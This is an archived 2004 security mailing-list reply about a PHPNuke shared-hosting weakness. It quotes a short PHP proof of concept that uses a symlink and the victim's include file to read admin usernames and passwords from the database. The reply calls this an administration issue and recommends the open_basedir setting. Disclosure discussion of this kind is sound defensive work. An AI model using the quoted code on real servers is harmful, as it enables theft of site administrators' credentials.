lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <20040601070954.GA23397@ipsupport.co.uk>
Date: Tue, 1 Jun 2004 08:09:54 +0100
From: Sam Bashton <sam@...upport.co.uk>
To: Luca Falavigna <fala83@...ero.it>
Cc: Bugtraq <bugtraq@...urityfocus.com>,
   Full Disclosure <full-disclosure@...ts.netsys.com>, fbc@...nmax.com
Subject: Re: Possible bug in PHPNuke and other CMS


On Sun, May 30, 2004 at 04:53:18PM +0200, Luca Falavigna wrote:
> There is a vulnerability in PHPNuke that permits execution of arbitrary
> SQL queries on a database located in the same server of an attacker's
> account. This is the procedure: first of all attacker must create a
> symlink pointing to victim's db directory in PHPNuke home directory
> because of mainfile.php include method. After that he can build a simple
> php code executing a query to the PHPNuke database. Here is an example:
> 
> <?php
> require_once ("/location_of_victim's_PHPNuke/mainfile.php");
> $sql = $db->sql_query("SELECT aid,pwd FROM ".$prefix."_authors");
> while($record = $db->sql_fetchrow($sql))
> ~  echo "Username: $record[aid]\n<br>\nPassword: $record[pwd]\n<br><br>\n";
> unset($sql);
> ?>

This is an administration issue rather than a security vulnerability.
In order to use this attack the attacker requires access to:

1.  Another site on the victim's server
2.  A sufficiently poorly administered server on which (s)he can:
    a.  Create a symlink 
    or
    b.  Specify an absolute path for includes

Those hosting multiple PHP sites ought to be using PHP's open_basedir
directive to limit the files that can be opened by PHP.  If this isn't
being used they are plenty of other easy attacks open to anyone with an
account on the same server.
    

-- 
Sam Bashton
Systems Administrator
IP Support 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ